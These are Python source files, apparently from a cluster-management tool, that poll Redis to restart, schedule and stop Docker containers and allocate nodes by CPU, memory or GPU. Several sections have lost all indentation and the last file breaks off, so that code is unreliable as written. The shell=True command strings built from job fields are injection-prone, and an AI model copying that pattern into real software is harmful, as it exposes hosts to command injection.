        """Start tracking exited containers.

        Returns:
            None.
        """
        # Infinite polling loop; this process never returns.
        while True:
            self._iterate_container_status()
            time.sleep(self._check_interval)

    def _iterate_container_status(self) -> None:
        """Iterate container status.

        Find the exited container and try to restart it if the rule exists.

        Returns:
            None.
        """
        # Get details.
        containers_details = get_containers_details(
            redis=self._redis,
            cluster_name=self._cluster_name
        )
        # Iterate container status.
        for container_name, container_details in containers_details.items():
            # Get job_runtime_details and flags.
            job_runtime_details = get_job_runtime_details(
                redis=self._redis,
                job_id=container_details["job_id"]
            )

            # Remove container.
            is_remove_container = self._is_remove_container(
                container_details=container_details,
                job_runtime_details=job_runtime_details
            )
            if is_remove_container:
                self._remove_container(container_name=container_name, container_details=container_details)

            # Restart container.
            if self._is_restart_container(
                container_details=container_details,
                job_runtime_details=job_runtime_details
            ):
                self._restart_container(container_name=container_name, container_details=container_details)

            # Stop job.
            if self._is_stop_job(container_details=container_details):
                self._stop_job(job_id=container_details["job_id"], is_remove_container=is_remove_container)

    @staticmethod
    def _is_remove_container(container_details: dict, job_runtime_details: dict) -> bool:
        """Check if the container need to be removed.

        Args:
            container_details (dict): Details of the container.
            job_runtime_details (dict): Runtime details of the job.

        Returns:
            bool: True or False.
        """
        return (
            container_details["state"]["Status"] == "exited"
            and job_runtime_details is not None
            and job_runtime_details.get("is_remove_failed_container") == "1"
        )

    def _is_restart_container(self, container_details: dict, job_runtime_details: dict) -> bool:
        """Check if the container need to be restarted.

        Args:
            container_details (dict): Details of the container.
            job_runtime_details (dict): Runtime details of the job.

        Returns:
            bool: True or False.
        """
        # BUGFIX: the restart-times lookup previously dereferenced job_runtime_details
        # before the `is not None` guard, raising AttributeError for jobs without
        # runtime details. Cheap guards now run first and short-circuit that path.
        if container_details["state"]["Status"] != "exited":
            return False
        if job_runtime_details is None or job_runtime_details.get("rejoin:enable") != "1":
            return False
        if container_details["state"]["ExitCode"] in ERROR_CODES_FOR_NOT_RESTART_CONTAINER:
            return False
        restart_times = get_rejoin_component_restart_times(
            self._redis,
            job_id=container_details["job_id"],
            component_id=container_details["component_id"]
        )
        # Restart only while under the configured cap (unbounded if not configured).
        return restart_times < int(job_runtime_details.get("rejoin:max_restart_times", sys.maxsize))

    @staticmethod
    def _is_stop_job(container_details: dict) -> bool:
        """Check if the job need to be stop.

        Args:
            container_details (dict): Details of the container.

        Returns:
            bool: True of False.
        """
        return (
            container_details["state"]["Status"] == "exited"
            and container_details["state"]["ExitCode"] == ERROR_CODE_FOR_STOP_JOB
        )

    def _restart_container(self, container_name: str, container_details: dict) -> None:
        """Restart container.

        Args:
            container_name (str): Name of the exited container.
            container_details (dict): Details of the exited container.

        Returns:
            None.
        """
        # Get component_name_to_container_name.
        rejoin_container_name_to_component_name = get_rejoin_container_name_to_component_name(
            redis=self._redis,
            job_id=container_details["job_id"]
        )
        # If the mapping not exists, or the container is not in the mapping, skip the restart operation.
        if (
            rejoin_container_name_to_component_name is None or
            container_name not in rejoin_container_name_to_component_name
        ):
            logger.warning(f"Container {container_name} is not found in container_name_to_component_name mapping")
            return
        try:
            # Get params.
            component_name = rejoin_container_name_to_component_name[container_name]

            # Get resources and allocation plan.
            free_resources = ResourceManagementExecutor.get_free_resources(
                redis=self._redis,
                cluster_name=self._cluster_name
            )
            required_resources = [
                ContainerResource(
                    container_name=ResourceManagementExecutor.build_container_name(
                        job_id=container_details["job_id"],
                        component_id=container_details["component_id"],
                        component_index=container_details["component_index"]
                    ),
                    cpu=float(container_details["cpu"]),
                    memory=float(container_details["memory"].replace("m", "")),
                    gpu=float(container_details["gpu"])
                )
            ]
            allocation_plan = ResourceManagementExecutor.get_single_metric_balanced_allocation_plan(
                allocation_details={"metric": "cpu"},
                required_resources=required_resources,
                free_resources=free_resources
            )

            # Start a new container.
            job_details = get_job_details(
                redis=self._redis,
                cluster_name=self._cluster_name,
                job_name=container_details["job_name"]
            )
            # `new_container_name` avoids shadowing the `container_name` parameter,
            # which the original loop variable silently clobbered.
            for new_container_name, node_name in allocation_plan.items():
                node_details = get_node_details(
                    redis=self._redis,
                    cluster_name=self._cluster_name,
                    node_name=node_name
                )
                self._start_container(
                    container_name=new_container_name,
                    node_details=node_details,
                    job_details=job_details,
                    component_name=component_name
                )
                incr_rejoin_component_restart_times(
                    redis=self._redis,
                    job_id=container_details["job_id"],
                    component_id=container_details["component_id"]
                )
        except AllocationFailed as e:
            logger.warning(f"Allocation failed with {e}")
        except StartContainerFailed as e:
            logger.warning(f"Start container failed with {e}")

    def _remove_container(self, container_name: str, container_details: dict) -> None:
        """Remove container.

        Args:
            container_name (str): Name of the container.
            container_details (dict): Details of the container.

        Returns:
            None.
        """
        # Get details and params.
        node_name = container_details["node_name"]
        node_details = get_node_details(
            redis=self._redis,
            cluster_name=self._cluster_name,
            node_name=node_name
        )

        # Load and exec command.
        command = REMOVE_CONTAINER_COMMAND.format(
            admin_username=self._admin_username,
            node_hostname=node_details["hostname"],
            containers=container_name,
            ssh_port=self._ssh_port
        )
        completed_process = subprocess.run(
            command,
            shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
        )
        if completed_process.returncode != 0:
            logger.error(f"No container {container_name} in {node_name}")

    def _stop_job(self, job_id: str, is_remove_container: bool) -> None:
        """Stop job.

        Args:
            job_id (str): Id of the job.
            is_remove_container (bool): If the containers need to be removed.

        Returns:
            None.
        """
        # Delete mapping if fault tolerance is activated.
        delete_rejoin_container_name_to_component_name(
            redis=self._redis,
            job_id=job_id
        )

        # Load details and vars.
        nodes_details = get_nodes_details(
            redis=self._redis,
            cluster_name=self._cluster_name
        )

        # Delete containers.
        for node_name, node_details in nodes_details.items():
            # Load details.
            container_details = node_details["containers"]
            node_hostname = node_details["hostname"]

            # Filter containers (container names are prefixed with their job id).
            stoppable_containers = []
            for container_name in container_details:
                if container_name.startswith(job_id):
                    stoppable_containers.append(container_name)

            # Stop containers.
            if len(stoppable_containers) > 0:
                if is_remove_container:
                    command = REMOVE_CONTAINER_COMMAND.format(
                        admin_username=self._admin_username,
                        node_hostname=node_hostname,
                        containers=" ".join(stoppable_containers),
                        ssh_port=self._ssh_port
                    )
                else:
                    command = STOP_CONTAINER_COMMAND.format(
                        admin_username=self._admin_username,
                        node_hostname=node_hostname,
                        containers=" ".join(stoppable_containers),
                        ssh_port=self._ssh_port
                    )
                completed_process = subprocess.run(
                    command,
                    shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                    encoding="utf8"
                )
                if completed_process.returncode != 0:
                    logger.error(completed_process.stderr)
                logger.info(command)

    def _start_container(self, container_name: str, node_details: dict, job_details: dict, component_name: str) -> None:
        """Start container.

        Args:
            container_name: Name of the container.
            node_details: Details of the node.
            job_details: Details of the job.
            component_name: Name of the component from mapping.

        Returns:
            None.

        Raises:
            AllocationFailed: if the remote `docker run` command exits non-zero.
        """
        # Get mapping.
        component_id_to_component_type = JobExecutor.get_component_id_to_component_type(job_details=job_details)

        # Parse params (container name encodes "<job_id>-<component_id>-<component_index>").
        cluster_name = self._cluster_name
        cluster_id = self._cluster_id
        node_id = node_details["id"]
        node_name = node_details["name"]
        job_id = job_details["id"]
        job_name = job_details["name"]
        component_id = container_name.split("-")[1]
        component_index = container_name.split("-")[2]
        component_type = component_id_to_component_type[component_id]
        cpu = job_details["components"][component_type]["resources"]["cpu"]
        memory = job_details["components"][component_type]["resources"]["memory"]
        gpu = job_details["components"][component_type]["resources"]["gpu"]

        # Parse environment parameters and labels.
        environment_parameters = (
            f"-e CLUSTER_ID={cluster_id} "
            f"-e CLUSTER_NAME={cluster_name} "
            f"-e NODE_ID={node_id} "
            f"-e NODE_NAME={node_name} "
            f"-e JOB_ID={job_id} "
            f"-e JOB_NAME={job_name} "
            f"-e COMPONENT_ID={component_id} "
            f"-e COMPONENT_TYPE={component_type} "
            f"-e COMPONENT_INDEX={component_index} "
            f"-e CONTAINER_NAME={container_name} "
            f"-e PYTHONUNBUFFERED=0 "
            f"-e COMPONENT_NAME={component_name}"
        )
        labels = (
            f"-l cluster_id={cluster_id} "
            f"-l cluster_name={cluster_name} "
            f"-l node_id={node_id} "
            f"-l node_name={node_name} "
            f"-l job_id={job_id} "
            f"-l job_name={job_name} "
            f"-l component_type={component_type} "
            f"-l component_id={component_id} "
            f"-l component_index={component_index} "
            f"-l container_name={container_name} "
            f"-l cpu={cpu} "
            f"-l memory={memory} "
            f"-l gpu={gpu}"
        )

        # Load command (GPU variant only when the component actually requests GPUs).
        if job_details["components"][component_type]["resources"]["gpu"] != 0:
            command = START_CONTAINER_WITH_GPU_COMMAND
        else:
            command = START_CONTAINER_COMMAND
        command = command.format(
            # cluster related.
            admin_username=self._admin_username,
            master_hostname=self._master_hostname,
            node_hostname=node_details["hostname"],
            fluentd_port=self._fluentd_port,
            ssh_port=self._ssh_port,

            # job related (user).
            cpu=cpu,
            memory=memory,
            gpu=gpu,
            mount_target=job_details["components"][component_type]["mount"]["target"],
            command=job_details["components"][component_type]["command"],
            image_name=job_details["components"][component_type]["image"],

            # job related (system).
            container_name=container_name,
            job_id=job_id,
            mount_source=f"~/.maro/clusters/{cluster_name}/data/",
            environment_parameters=environment_parameters,
            labels=labels
        )

        # Exec command.
        logger.info(command)
        completed_process = subprocess.run(
            command,
            shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
        )
        if completed_process.returncode != 0:
            raise AllocationFailed(completed_process.stderr)
class PendingJobAgent(multiprocessing.Process):
    """Poll pending job tickets, compute an allocation plan, and start the job containers."""

    def __init__(self, cluster_details: dict, check_interval: int = 5):
        super().__init__()
        self._cluster_name = cluster_details["name"]
        self._cluster_id = cluster_details["id"]
        self._admin_username = cluster_details["user"]["admin_username"]
        self._fluentd_port = cluster_details["master"]["fluentd"]["port"]
        self._ssh_port = cluster_details["connection"]["ssh"]["port"]
        self._master_hostname = cluster_details["master"]["hostname"]
        self._redis = Redis(
            host="localhost",
            port=cluster_details["master"]["redis"]["port"],
            charset="utf-8", decode_responses=True
        )
        self._check_interval = check_interval
        self._pending_jobs = []

    def run(self) -> None:
        """Start tracking pending job tickets.

        Returns:
            None.
        """
        # Infinite polling loop; this process never returns.
        while True:
            self._schedule_pending_job_tickets()
            time.sleep(self._check_interval)

    def _schedule_pending_job_tickets(self) -> None:
        """Schedule pending job tickets.

        Returns:
            None.
        """
        # Get tickets.
        self._pending_jobs = get_pending_job_tickets(
            redis=self._redis,
            cluster_name=self._cluster_name
        )

        # Iterate tickets.
        for pending_job_name in self._pending_jobs:
            # Get details.
            job_details = get_job_details(
                redis=self._redis,
                cluster_name=self._cluster_name,
                job_name=pending_job_name
            )

            # Get resources info.
            free_resources = ResourceManagementExecutor.get_free_resources(
                redis=self._redis,
                cluster_name=self._cluster_name
            )
            required_resources = ResourceManagementExecutor.get_required_resources(job_details=job_details)

            # Do allocation and start job.
            # On AllocationFailed the ticket is KEPT (retried next cycle);
            # on StartContainerFailed the ticket is removed and the job dropped.
            try:
                allocation_plan = ResourceManagementExecutor.get_allocation_plan(
                    allocation_details=job_details["allocation"],
                    required_resources=required_resources,
                    free_resources=free_resources
                )
                for container_name, node_name in allocation_plan.items():
                    node_details = get_node_details(
                        redis=self._redis,
                        cluster_name=self._cluster_name,
                        node_name=node_name
                    )
                    self._start_container(
                        container_name=container_name,
                        node_details=node_details,
                        job_details=job_details
                    )
                remove_pending_job_ticket(
                    redis=self._redis,
                    cluster_name=self._cluster_name,
                    job_name=pending_job_name
                )
            except AllocationFailed as e:
                logger.warning(f"Allocation failed with {e}")
            except StartContainerFailed as e:
                remove_pending_job_ticket(
                    redis=self._redis,
                    cluster_name=self._cluster_name,
                    job_name=pending_job_name
                )
                logger.warning(f"Start container failed with {e}")

    def _start_container(self, container_name: str, node_details: dict, job_details: dict):
        """Start container.

        Args:
            container_name: Name of the container.
            node_details: Details of the node.
            job_details: Details of the job.

        Returns:
            None.
        """
        # Get mapping.
        component_id_to_component_type = JobExecutor.get_component_id_to_component_type(job_details=job_details)

        # Parse params (container name encodes "<job_id>-<component_id>-<component_index>").
        cluster_name = self._cluster_name
        cluster_id = self._cluster_id
        node_id = node_details["id"]
        node_name = node_details["name"]
        job_name = job_details["name"]
        job_id = job_details["id"]
        component_id = container_name.split("-")[1]
        component_index = container_name.split("-")[2]
        component_type = component_id_to_component_type[component_id]
        cpu = job_details["components"][component_type]["resources"]["cpu"]
        memory = job_details["components"][component_type]["resources"]["memory"]
        gpu = job_details["components"][component_type]["resources"]["gpu"]

        # Parse environment parameters and labels.
        environment_parameters = (
            f"-e CLUSTER_ID={cluster_id} "
            f"-e CLUSTER_NAME={cluster_name} "
            f"-e NODE_ID={node_id} "
            f"-e NODE_NAME={node_name} "
            f"-e JOB_ID={job_id} "
            f"-e JOB_NAME={job_name} "
            f"-e COMPONENT_ID={component_id} "
            f"-e COMPONENT_TYPE={component_type} "
            f"-e COMPONENT_INDEX={component_index} "
            f"-e CONTAINER_NAME={container_name} "
            f"-e PYTHONUNBUFFERED=0"
        )
        labels = (
            f"-l cluster_id={cluster_id} "
            f"-l cluster_name={cluster_name} "
            f"-l node_id={node_id} "
            f"-l node_name={node_name} "
            f"-l job_id={job_id} "
            f"-l job_name={job_name} "
            f"-l component_type={component_type} "
            f"-l component_id={component_id} "
            f"-l component_index={component_index} "
            f"-l container_name={container_name} "
            f"-l cpu={cpu} "
            f"-l memory={memory} "
            f"-l gpu={gpu}"
        )

        # Load command (GPU variant only when the component actually requests GPUs).
        if job_details["components"][component_type]["resources"]["gpu"] != 0:
            command = START_CONTAINER_WITH_GPU_COMMAND
        else:
            command = START_CONTAINER_COMMAND
        command = command.format(
            # cluster related.
            admin_username=self._admin_username,
            master_hostname=self._master_hostname,
            node_hostname=node_details["hostname"],
            fluentd_port=self._fluentd_port,
            ssh_port=self._ssh_port,

            # job related (user).
            cpu=cpu,
            memory=memory,
            gpu=gpu,
            mount_target=job_details["components"][component_type]["mount"]["target"],
            command=job_details["components"][component_type]["command"],
            image_name=job_details["components"][component_type]["image"],

            # job related (system).
            container_name=container_name,
            job_id=job_id,
            mount_source=f"~/.maro/clusters/{cluster_name}/data/",
            environment_parameters=environment_parameters,
            labels=labels
        )

        # Exec command.
        logger.info(command)
        completed_process = subprocess.run(
            command,
            shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
        )
        if completed_process.returncode != 0:
            raise AllocationFailed(completed_process.stderr)
class KilledJobAgent(multiprocessing.Process):
    def __init__(self, cluster_details: dict, check_interval: int = 5):
        """Store cluster identity, ssh parameters and a redis connection for ticket polling.

        Args:
            cluster_details (dict): full cluster details dict.
            check_interval (int): seconds between ticket polls.
        """
        super().__init__()
        self._cluster_name = cluster_details["name"]
        self._cluster_id = cluster_details["id"]
        self._admin_username = cluster_details["user"]["admin_username"]
        self._ssh_port = cluster_details["connection"]["ssh"]["port"]
        # The master's redis is reached via localhost — this agent runs on the master node.
        self._redis = Redis(
            host="localhost",
            port=cluster_details["master"]["redis"]["port"],
            charset="utf-8", decode_responses=True
        )
        self._check_interval = check_interval
        self._killed_job_tickets = []
def run(self) -> None:
"""Start tracking killed job tickets.
Returns:
None.
"""
while True:
self._schedule_killed_job_tickets()
time.sleep(self._check_interval)
def _schedule_killed_job_tickets(self):
"""Schedule killed job tickets.
Returns:
None.
"""
# Get tickets.
self._killed_job_tickets = get_killed_job_tickets(
redis=self._redis,
cluster_name=self._cluster_name
)
# Iterate tickets.
for job_name in self._killed_job_tickets:
# Get details.
job_details = get_job_details(
redis=self._redis,
cluster_name=self._cluster_name,
job_name=job_name
)
if job_details is not None:
# Kill job.
self._kill_job(job_details=job_details)
else:
logger.warning(f"{job_name} not exists, cannot be stopped")
# Remove killed job ticket.
remove_killed_job_ticket(
redis=self._redis,
cluster_name=self._cluster_name,
job_name=job_name
)
def _kill_job(self, job_details: dict) -> None:
"""Kill job and stop containers.
Args:
job_details (dict): Details of the job.
Returns:
None.
"""
# Get params.
job_id = job_details["id"]
# Delete mapping if fault tolerance is activated.
delete_rejoin_container_name_to_component_name(
redis=self._redis,
job_id=job_id
)
# Load details and vars.
nodes_details = get_nodes_details(
redis=self._redis,
cluster_name=self._cluster_name
)
# Delete containers.
for node_name, node_details in nodes_details.items():
# Load details.
container_details = node_details["containers"]
node_hostname = node_details["hostname"]
# Filter containers.
removable_containers = []
for container_name in container_details:
if container_name.startswith(job_id):
removable_containers.append(container_name)
# Stop containers.
if len(removable_containers) > 0:
command = STOP_CONTAINER_COMMAND.format(
admin_username=self._admin_username,
node_hostname=node_hostname,
containers=" ".join(removable_containers),
ssh_port=self._ssh_port
)
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
encoding="utf8"
)
if completed_process.returncode != 0:
logger.error(completed_process.stderr)
logger.info(command)
class ResourceManagementExecutor:
@staticmethod
def get_allocation_plan(allocation_details: dict, required_resources: list, free_resources: list) -> dict:
"""Get container allocation mapping.
Args:
allocation_details (dict): Details of allocation config.
required_resources (list): List of ContainerResource.
free_resources (list): List of NodeResource.
Returns:
dict: container_name to node_name mapping.
"""
if allocation_details["mode"] == "single-metric-balanced":
return ResourceManagementExecutor.get_single_metric_balanced_allocation_plan(
allocation_details=allocation_details,
required_resources=required_resources,
free_resources=free_resources
)
elif allocation_details["mode"] == "single-metric-compacted":
return ResourceManagementExecutor.get_single_metric_compacted_allocation_plan(
allocation_details=allocation_details,
required_resources=required_resources,
free_resources=free_resources
)
else:
raise AllocationFailed("Invalid allocation mode")
@staticmethod
def get_single_metric_compacted_allocation_plan(
allocation_details: dict,
required_resources: list, free_resources: list
) -> dict:
"""Get single_metric_compacted allocation plan.
The strategy uses a specific metric as the priority,
then use a greedy approach to match the container to the available node
with the smallest remaining free resource.
Args:
allocation_details (dict): Details of allocation config.
required_resources (list): List of ContainerResource.
free_resources (list): List of NodeResource.
Returns:
dict[str, str]: container_name to node_name mapping.
"""
# Init params.
allocation_plan = {}
if "metric" not in allocation_details or allocation_details["metric"].lower() not in AVAILABLE_METRICS:
raise AllocationFailed("Invalid allocation parameter: metric")
metric = allocation_details["metric"].lower()
# Init resources PQ.
required_resources_pq = []
for required_resource in required_resources:
heapq.heappush(
required_resources_pq,
(-getattr(required_resource, metric), required_resource)
)
free_resources_pq = []
for free_resource in free_resources:
heapq.heappush(
free_resources_pq,
(getattr(free_resource, metric), free_resource)
)
# Get allocation.
while len(required_resources_pq) > 0:
is_allocated = False
# Get vars.
required_resource = heapq.heappop(required_resources_pq)[1]
free_resource = None
not_usable_free_resources = []
while len(free_resources_pq) > 0:
free_resource = heapq.heappop(free_resources_pq)[1]
if free_resource >= required_resource:
is_allocated = True
break
else:
not_usable_free_resources.append(free_resource)
# Do allocation or return error.
if is_allocated:
allocation_plan[required_resource.container_name] = free_resource.node_name
free_resource.cpu -= required_resource.cpu
free_resource.memory -= required_resource.memory
free_resource.gpu -= required_resource.gpu
heapq.heappush(
free_resources_pq,
(getattr(free_resource, metric), free_resource)
)
for not_usable_free_resource in not_usable_free_resources:
heapq.heappush(
free_resources_pq,
(getattr(not_usable_free_resource, metric), not_usable_free_resource)
)
else:
# add previous resources back, to do printing.
for not_usable_free_resource in not_usable_free_resources:
heapq.heappush(
free_resources_pq,
(getattr(not_usable_free_resource, metric), not_usable_free_resource)
)
heapq.heappush(
required_resources_pq,
(-getattr(required_resource, metric), required_resource)
)
logger.warning(allocation_plan)
logger.warning(required_resources_pq)
logger.warning(free_resources_pq)
raise AllocationFailed("Unable to allocate, Abort")
logger.info(required_resources)
logger.info(free_resources)
return allocation_plan
@staticmethod
def get_single_metric_balanced_allocation_plan(
allocation_details: dict,
required_resources: list, free_resources: list
) -> dict:
"""Get single_metric_balanced allocation plan.
The strategy uses a specific metric as the priority,
then use a greedy approach to match the container to the available node
with the largest remaining free resource.
Args:
allocation_details (dict): Details of allocation config.
required_resources (list): List of ContainerResource.
free_resources (list): List of NodeResource.
Returns:
dict[str, str]: container_name to node_name mapping.
"""
# Init params.
allocation_plan = {}
if "metric" not in allocation_details or allocation_details["metric"].lower() not in AVAILABLE_METRICS:
raise AllocationFailed("Invalid allocation parameter: metric")
metric = allocation_details["metric"].lower()
# Init resources PQ.
required_resources_pq = []
for required_resource in required_resources:
heapq.heappush(
required_resources_pq,
(-getattr(required_resource, metric), required_resource)
)
free_resources_pq = []
for free_resource in free_resources:
heapq.heappush(
free_resources_pq,
(-getattr(free_resource, metric), free_resource)
)
# Get allocation.
while len(required_resources_pq) > 0:
# Get list, not tuple.
required_resource = heapq.heappop(required_resources_pq)[1]
not_usable_free_resources = []
is_allocated = False
free_resource = None
while len(free_resources_pq) > 0:
# Get list, not tuple.
free_resource = heapq.heappop(free_resources_pq)[1]
if free_resource >= required_resource:
is_allocated = True
break
else:
not_usable_free_resources.append(free_resource)
# Do allocation or return error.
if is_allocated:
allocation_plan[required_resource.container_name] = free_resource.node_name
free_resource.cpu -= required_resource.cpu
free_resource.memory -= required_resource.memory
free_resource.gpu -= required_resource.gpu
heapq.heappush(
free_resources_pq,
(-getattr(free_resource, metric), free_resource)
)
for not_usable_free_resource in not_usable_free_resources:
heapq.heappush(
free_resources_pq,
(-getattr(not_usable_free_resource, metric), not_usable_free_resource)
)
else:
# add previous resources back, to do printing.
for not_usable_free_resource in not_usable_free_resources:
heapq.heappush(
free_resources_pq,
(-getattr(not_usable_free_resource, metric), not_usable_free_resource)
)
heapq.heappush(
required_resources_pq,
(-getattr(required_resource, metric), required_resource)
)
logger.warning(allocation_plan)
logger.warning(required_resources_pq)
logger.warning(free_resources_pq)
raise AllocationFailed("Unable to allocate, Abort")
logger.info(required_resources)
logger.info(free_resources)
return allocation_plan
@staticmethod
def get_free_resources(redis: Redis, cluster_name: str) -> list:
"""Get free resources of nodes in cluster.
Args:
redis (Redis): Redis Client of current cluster.
cluster_name (str): Name of the cluster.
Returns:
list: List of NodeResource.
"""
# Load details.
nodes_details = get_nodes_details(
redis=redis,
cluster_name=cluster_name
)
# Get free resources.
free_resources_list = []
for node_name, node_details in nodes_details.items():
target_free_cpu = node_details["resources"]["target_free_cpu"]
target_free_memory = node_details["resources"]["target_free_memory"]
target_free_gpu = node_details["resources"]["target_free_gpu"]
if node_details["state"] == "Running":
free_resources_list.append(
NodeResource(
node_name=node_name,
cpu=target_free_cpu,
memory=target_free_memory,
gpu=target_free_gpu
)
)
return free_resources_list
@staticmethod
def get_required_resources(job_details: dict) -> list:
"""Get required resources from job_details.
Args:
job_details: Details of jobs.
Returns:
list: List of ContainerResource.
"""
# Load configs.
components_details = job_details["components"]
job_id = job_details["id"]
# Get required resources.
resources_list = []
for component_type, component_details in components_details.items():
component_id = component_details["id"]
component_num = component_details["num"]
required_cpu = component_details["resources"]["cpu"]
required_memory = int(component_details["resources"]["memory"].replace("m", ""))
required_gpu = component_details["resources"]["gpu"]
for i in range(component_num):
resources_list.append(
ContainerResource(
container_name=ResourceManagementExecutor.build_container_name(job_id, component_id, i),
cpu=required_cpu,
memory=required_memory,
gpu=required_gpu,
)
)
return resources_list
@staticmethod
def build_container_name(job_id: str, component_id: str, component_index: int) -> str:
"""Build the container name with job-related params.
Ref: The container name must be from 1 to 255 characters long.
Args:
job_id: The Id of the job.
component_id: The Id of the component.
component_index: The index of the current component.
Returns:
str: Name of the container.
"""
return f"{job_id}-{component_id}-{component_index}-{uuid.uuid4().hex[:6]}"
class JobExecutor:
    @staticmethod
    def get_component_id_to_component_type(job_details: dict) -> dict:
        """Build a component_id -> component_type lookup from job details.

        Args:
            job_details: Details of jobs.

        Returns:
            dict[str, str]: component_id_to_component_type mapping.
        """
        return {
            component_details["id"]: component_type
            for component_type, component_details in job_details["components"].items()
        }
if __name__ == "__main__":
    # Entry point: verbose logging to stdout, then run the master agent for
    # the cluster named in the local agent config file.
    logging.basicConfig(level=logging.DEBUG,
                        format="[%(levelname)-7s] - %(asctime)s - %(message)s",
                        datefmt="%Y-%m-%d %H:%M:%S")
    with open(os.path.expanduser("~/.maro-local/agents/master_agent.config"), "r") as fr:
        master_agent_config = json.load(fr)
    # NOTE(review): MasterAgent is defined earlier in this file; start() is
    # expected to launch the sub-agent processes — confirm against its definition.
    master_agent = MasterAgent(
        cluster_name=master_agent_config["cluster_name"]
    )
    master_agent.start()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import os
import yaml
from redis import Redis
"""Load from files"""
def load_cluster_details(cluster_name: str) -> dict:
with open(os.path.expanduser(f"~/.maro/clusters/{cluster_name}/details.yml"), 'r') as fr:
cluster_details = yaml.safe_load(fr)
return cluster_details
def load_job_details(cluster_name: str, job_name: str) -> dict:
    """Read and parse a job's details.yml from the local ~/.maro folder."""
    details_path = os.path.expanduser(f"~/.maro/clusters/{cluster_name}/jobs/{job_name}/details.yml")
    with open(details_path, 'r') as fr:
        return yaml.safe_load(fr)
"""Node details"""
def get_node_details(redis: Redis, cluster_name: str, node_name: str) -> dict:
return json.loads(
redis.hget(
f"{cluster_name}:node_details",
node_name
)
)
def get_nodes_details(redis: Redis, cluster_name: str) -> dict:
    """Fetch and deserialize the details of every node in the cluster."""
    raw_mapping = redis.hgetall(f"{cluster_name}:node_details")
    return {name: json.loads(raw) for name, raw in raw_mapping.items()}
def set_node_details(redis: Redis, cluster_name: str, node_name: str, node_details: dict) -> None:
    """Serialize and store a single node's details in Redis."""
    redis.hset(f"{cluster_name}:node_details", node_name, json.dumps(node_details))
"""Job details"""
def get_job_details(redis: Redis, cluster_name: str, job_name: str) -> dict:
return_str = redis.hget(
f"{cluster_name}:job_details",
job_name
)
return json.loads(return_str) if return_str is not None else None
def get_jobs_details(redis: Redis, cluster_name: str) -> dict:
    """Fetch and deserialize the details of every job in the cluster."""
    raw_mapping = redis.hgetall(f"{cluster_name}:job_details")
    return {name: json.loads(raw) for name, raw in raw_mapping.items()}
def set_job_details(redis: Redis, cluster_name: str, job_name: str, job_details: dict) -> None:
    """Serialize and store a single job's details in Redis."""
    redis.hset(f"{cluster_name}:job_details", job_name, json.dumps(job_details))
"""Containers details"""
def get_containers_details(redis: Redis, cluster_name: str) -> dict:
containers_details = redis.hgetall(
f"{cluster_name}:container_details",
)
for container_name, container_details in containers_details.items():
containers_details[container_name] = json.loads(container_details)
return containers_details
def set_containers_details(redis: Redis, cluster_name: str, containers_details: dict) -> None:
    """Replace the cluster's whole container_details hash with the given mapping.

    Fix vs. original: serialize into a fresh dict instead of overwriting the
    caller's values in place, so the argument dict is no longer mutated.

    Args:
        redis (Redis): Redis Client of current cluster.
        cluster_name (str): Name of the cluster.
        containers_details (dict): container_name -> details dict.
    """
    redis.delete(f"{cluster_name}:container_details")
    if not containers_details:
        return
    serialized = {name: json.dumps(details) for name, details in containers_details.items()}
    # NOTE(review): hmset is deprecated in modern redis-py in favor of
    # hset(..., mapping=...); kept to avoid changing the client requirement.
    redis.hmset(
        f"{cluster_name}:container_details",
        serialized
    )
def set_container_details(redis: Redis, cluster_name: str, container_name: str, container_details: dict) -> None:
    """Serialize and store one container's details in Redis.

    Fix vs. original: json.dumps the dict before writing — the sibling setters
    (set_node_details, set_job_details) serialize, and the reader
    (get_containers_details) json.loads every value; a raw dict cannot be
    stored as a Redis hash value.
    """
    redis.hset(
        f"{cluster_name}:container_details",
        container_name,
        json.dumps(container_details)
    )
"""Pending job ticket"""
def get_pending_job_tickets(redis: Redis, cluster_name: str):
return redis.lrange(
f"{cluster_name}:pending_job_tickets",
0,
-1
)
def remove_pending_job_ticket(redis: Redis, cluster_name: str, job_name: str):
    """Delete all occurrences of the job's ticket from the pending queue."""
    redis.lrem(f"{cluster_name}:pending_job_tickets", 0, job_name)
"""Killed job ticket"""
def get_killed_job_tickets(redis: Redis, cluster_name: str):
return redis.lrange(
f"{cluster_name}:killed_job_tickets",
0,
-1
)
def remove_killed_job_ticket(redis: Redis, cluster_name: str, job_name: str):
    """Delete all occurrences of the job's ticket from the killed queue."""
    redis.lrem(f"{cluster_name}:killed_job_tickets", 0, job_name)
"""Fault tolerance related"""
def get_rejoin_component_name_to_container_name(redis: Redis, job_id: str) -> dict:
return redis.hgetall(
f"job:{job_id}:rejoin_component_name_to_container_name"
)
def get_rejoin_container_name_to_component_name(redis: Redis, job_id: str) -> dict:
    """Return the inverse mapping: container_name -> component_name."""
    forward_mapping = get_rejoin_component_name_to_container_name(redis=redis, job_id=job_id)
    return {container: component for component, container in forward_mapping.items()}
def delete_rejoin_container_name_to_component_name(redis: Redis, job_id: str) -> None:
    """Drop the job's rejoin mapping entirely."""
    redis.delete(f"job:{job_id}:rejoin_component_name_to_container_name")
def get_job_runtime_details(redis: Redis, job_id: str) -> dict:
    """Return the job's runtime_details hash as stored in Redis."""
    return redis.hgetall(f"job:{job_id}:runtime_details")
def get_rejoin_component_restart_times(redis, job_id: str, component_id: str) -> int:
    """Return how many times the component has been restarted (0 when unrecorded)."""
    restart_times = redis.hget(f"job:{job_id}:component_id_to_restart_times", component_id)
    if restart_times is None:
        return 0
    return int(restart_times)
def incr_rejoin_component_restart_times(redis, job_id: str, component_id: str) -> None:
    """Atomically bump the component's restart counter by one."""
    redis.hincrby(f"job:{job_id}:component_id_to_restart_times", component_id, 1)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import argparse
import os
import subprocess
import sys
import platform
"""
This file is used for creating a user account with SSH public key settings on node.
Example:
sudo python3 create_user.py {account name} "{RSA public key}"
"""
def run_command(command: str) -> str:
if platform.system() == "Windows":
command = f"powershell.exe -Command \"{command}\""
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
if completed_process.returncode != 0:
